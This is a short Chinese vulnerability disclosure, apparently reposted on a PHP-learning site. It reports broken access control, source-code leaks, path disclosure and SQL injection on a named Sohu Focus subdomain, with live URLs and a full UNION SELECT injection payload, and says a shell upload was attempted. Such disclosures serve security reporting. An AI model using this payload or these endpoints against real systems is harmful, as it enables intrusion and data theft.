来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 1、权限设置有问题:直接访问后台的一个应用:ip转向审核(没搞清楚到底是干嘛的。。)http: ncfile focus cn common modules bbsadm trans_domain_app php?page=499app=12、源码泄露http: ncfile focus cn c...
|
1、权限设置有问题: 直接访问后台的一个应用:ip转向审核(没搞清楚到底是干嘛的。。) http://ncfile.focus.cn/common/modules/bbsadm/trans_domain_app.php?page=499&app=1
2、源码泄露 http://ncfile.focus.cn/common/modules/dmc/adm/rdistnsPYpl http://ncfile.focus.cn/common/modules/dmc/votehouse_view.left.inc http://ncfile.focus.cn/common/dao/dao.tpl.php 3、测试页面未删除暴露物理路径 http://ncfile.focus.cn/common/admin/test.php
4、注入,支持union,有物理路径,可以查user表,貌似可以导出文件拿shell,但没成功,好像有过滤。。。 地址就是上面那个ip转向审核系统: http://ncfile.focus.cn/common/modules/bbsadm/trans_domain_app.php?page=499&app=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%20limit%200,1–+ 搜狐焦点某站漏洞打包(后台权限泄漏、注入等)
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
